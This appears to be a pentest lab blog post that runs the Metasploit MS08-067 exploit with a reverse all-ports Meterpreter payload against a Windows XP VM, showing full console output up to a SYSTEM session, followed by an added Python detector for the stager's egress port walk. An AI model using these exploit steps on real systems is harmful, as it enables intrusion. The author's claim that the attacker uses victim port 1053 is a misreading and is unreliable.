Channel: Pax Pentest » Exploit

Metasploit All-Ports Payloads: Brute Forcing Ports


I’m targeting ports on the Windows portion of my Virtual Hacking Lab and following instructions given in Chapter 5 (The Joy of Exploitation) of Metasploit: The Penetration Tester’s Guide.

The exploitee system is Windows XP Pro Service Pack 2 (unpatched), with the firewall and software updates switched off, Microsoft Internet Information Services (IIS) and the FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

The object of this is for Metasploit to uncover open ports on the victim machine. My input is the text typed after each msf prompt:

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > search ports
[!] Database not connected or cache not built, using slow search

Matching Modules
================

Name  Disclosure Date  Rank  Description
----  ---------------  ----  -----------
auxiliary/admin/misc/wol normal UDP Wake-On-Lan (WOL)
auxiliary/admin/natpmp/natpmp_map normal NAT-PMP Port Mapper
auxiliary/admin/postgres/postgres_readfile normal PostgreSQL Server Generic Query
auxiliary/bnat/bnat_router normal BNAT Router
auxiliary/bnat/bnat_scan normal BNAT Scanner
auxiliary/scanner/http/apache_activemq_traversal normal Apache ActiveMQ Directory Traversal
auxiliary/scanner/http/vmware_server_dir_trav normal VMware Server Directory Traversal Vulnerability
auxiliary/scanner/http/wordpress_pingback_access normal WordPress Pingback Locator
auxiliary/scanner/misc/zenworks_preboot_fileaccess normal Novell ZENworks Configuration Management Preboot Service Remote File Access
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP “XMas” Port Scanner
auxiliary/scanner/rservices/rexec_login normal rexec Authentication Scanner
auxiliary/scanner/rservices/rlogin_login normal rlogin Authentication Scanner
auxiliary/scanner/rservices/rsh_login normal rsh Authentication Scanner
auxiliary/scanner/scada/digi_realport_serialport_scan normal Digi RealPort Serial Server Port Scanner
auxiliary/scanner/snmp/snmp_enum normal SNMP Enumeration Module
auxiliary/scanner/vnc/vnc_login normal VNC Authentication Scanner
auxiliary/server/capture/mssql normal Authentication Capture: MSSQL
auxiliary/server/http_ntlmrelay normal HTTP Client MS Credential Relayer
exploit/linux/http/alcatel_omnipcx_mastercgi_exec 2007-09-09 manual Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution
exploit/multi/browser/java_rhino 2011-10-18 excellent Java Applet Rhino Script Engine Remote Code Execution
exploit/multi/misc/hp_vsa_exec 2011-11-11 excellent HP StorageWorks P4000 Virtual SAN Appliance Command Execution
exploit/multi/misc/java_rmi_server 2011-10-15 excellent Java RMI Server Insecure Default Configuration Java Code Execution
exploit/windows/browser/adobe_flash_sps 2011-08-09 normal Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
exploit/windows/browser/crystal_reports_printcontrol 2010-12-14 normal Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow
exploit/windows/browser/ms10_018_ie_tabular_activex 2010-03-09 good Internet Explorer Tabular Data Control ActiveX Memory Corruption
exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent Microsoft Help Center XSS and Command Execution
exploit/windows/browser/ms11_093_ole32 2011-12-13 normal MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution
exploit/windows/browser/ms12_004_midi 2012-01-10 normal MS12-004 midiOutPlayNextPolyEvent Heap Overflow
exploit/windows/browser/ms12_037_same_id 2012-06-12 normal MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption
exploit/windows/browser/tom_sawyer_tsgetx71ex552 2011-05-03 normal Tom Sawyer Software GET Extension Factory Remote Code Execution
exploit/windows/fileformat/openoffice_ole 2008-04-17 normal OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow
exploit/windows/fileformat/ursoft_w32dasm 2005-01-24 good URSoft W32Dasm Disassembler Function Buffer Overflow
exploit/windows/http/apache_mod_rewrite_ldap 2006-07-28 great Apache module mod_rewrite LDAP protocol Buffer Overflow
exploit/windows/http/ca_totaldefense_regeneratereports 2011-04-13 excellent CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection
exploit/windows/http/savant_31_overflow 2002-09-10 great Savant 3.1 Web Server Overflow
exploit/windows/misc/allmediaserver_bof 2012-07-04 normal ALLMediaServer 0.8 Buffer Overflow
exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great Microsoft SQL Server Database Link Crawling Command Execution
exploit/windows/mssql/mssql_payload_sqli 2000-05-30 excellent Microsoft SQL Server Payload Execution via SQL Injection
exploit/windows/novell/zenworks_preboot_op4c_bof 2012-02-22 normal Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow
exploit/windows/novell/zenworks_preboot_op6c_bof 2012-02-22 normal Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow
exploit/windows/scada/scadapro_cmdexe 2011-09-16 excellent Measuresoft ScadaPro <= 4.0.0 Remote Command Execution
exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual Microsoft Workstation Service NetpManageIPCConnect Overflow
payload/windows/dllinject/reverse_tcp_allports normal Reflective DLL Injection, Reverse All-Port TCP Stager
payload/windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
payload/windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
payload/windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
payload/windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
payload/windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
payload/windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
post/linux/gather/checkvm normal Linux Gather Virtual Environment Detection
post/linux/gather/enum_network normal Linux Gather Network Information
post/solaris/gather/checkvm normal Solaris Gather Virtual Environment Detection
post/windows/gather/checkvm normal Windows Gather Virtual Environment Detection
post/windows/manage/clone_proxy_settings normal Windows Manage Proxy Setting Cloner

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp_allports
PAYLOAD => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.70:1
msf exploit(ms08_067_netapi) > [*] Attempting to trigger the vulnerability…
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:1 -> 192.168.1.79:1053) at 2013-06-06 10:09:59 +0100

msf exploit(ms08_067_netapi) > sessions -l -v

Active sessions
===============

Id  Type  Information  Connection  Via
--  ----  -----------  ----------  ---
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ LAB 192.168.1.70:1 -> 192.168.1.79:1053 (192.168.1.79) exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1…

meterpreter >

This line:

[*] Meterpreter session 1 opened (192.168.1.70:1 -> 192.168.1.79:1053) at 2013-06-06 10:09:59 +0100

shows me that my attacking machine is using port 1053 on the victim machine.
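From the defender's side, the distinctive thing about the all-ports stager used above is how it behaves at the perimeter: it tries to connect back to LHOST on LPORT, then LPORT+1, and so on until one outbound connection is allowed. The following detection is an added example (not code from the original post or from Metasploit) that runs over a constructed egress-firewall log in an assumed "timestamp ACTION TCP src:port -> dst:port" format and flags a source/destination pair that walks consecutive destination ports, reporting the first port that got out.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed egress-firewall log (not from the original post). Host 10.0.0.79
# walks outbound ports upward one at a time towards one external address, which
# is what reverse_tcp_allports looks like from the perimeter; port 6 gets out.
SAMPLE_LOG = """\
2013-06-06T10:09:50 DENY TCP 10.0.0.79:1050 -> 203.0.113.70:1
2013-06-06T10:09:50 DENY TCP 10.0.0.79:1051 -> 203.0.113.70:2
2013-06-06T10:09:51 DENY TCP 10.0.0.79:1052 -> 203.0.113.70:3
2013-06-06T10:09:51 DENY TCP 10.0.0.79:1053 -> 203.0.113.70:4
2013-06-06T10:09:52 DENY TCP 10.0.0.79:1054 -> 203.0.113.70:5
2013-06-06T10:09:52 ALLOW TCP 10.0.0.79:1055 -> 203.0.113.70:6
2013-06-06T10:09:53 ALLOW TCP 10.0.0.23:49152 -> 198.51.100.9:443
"""

LINE_RE = re.compile(r"(?P<ts>\S+) (?P<action>ALLOW|DENY) TCP "
                     r"(?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<dport>\d+)$")

def parse(log):
    """Yield (timestamp, action, src, dst, dport) for each well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield (datetime.fromisoformat(m["ts"]), m["action"],
                   m["src"], m["dst"], int(m["dport"]))

def find_port_walks(log, min_ports=5, window_s=30):
    """Return {(src, dst): (first_port, last_port, first_allowed_port)} for pairs
    hitting >= min_ports consecutive destination ports within window_s seconds."""
    by_pair = defaultdict(list)
    for ts, action, src, dst, dport in parse(log):
        by_pair[(src, dst)].append((dport, ts, action))
    hits = {}
    for pair, events in by_pair.items():
        events.sort()                      # by destination port, then time
        ports = [p for p, _, _ in events]
        start = 0
        for i in range(1, len(ports) + 1):
            # a run ends when the next port is neither a retry nor port + 1
            if i == len(ports) or ports[i] not in (ports[i-1], ports[i-1] + 1):
                run = events[start:i]
                distinct = {p for p, _, _ in run}
                span = (run[-1][1] - run[0][1]).total_seconds()
                if len(distinct) >= min_ports and span <= window_s:
                    allowed = [p for p, _, a in run if a == "ALLOW"]
                    hits[pair] = (run[0][0], run[-1][0], allowed[0] if allowed else None)
                start = i
    return hits
```

The first allowed port in a flagged run is the egress hole the stager found, which is the rule a responder would want to tighten.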
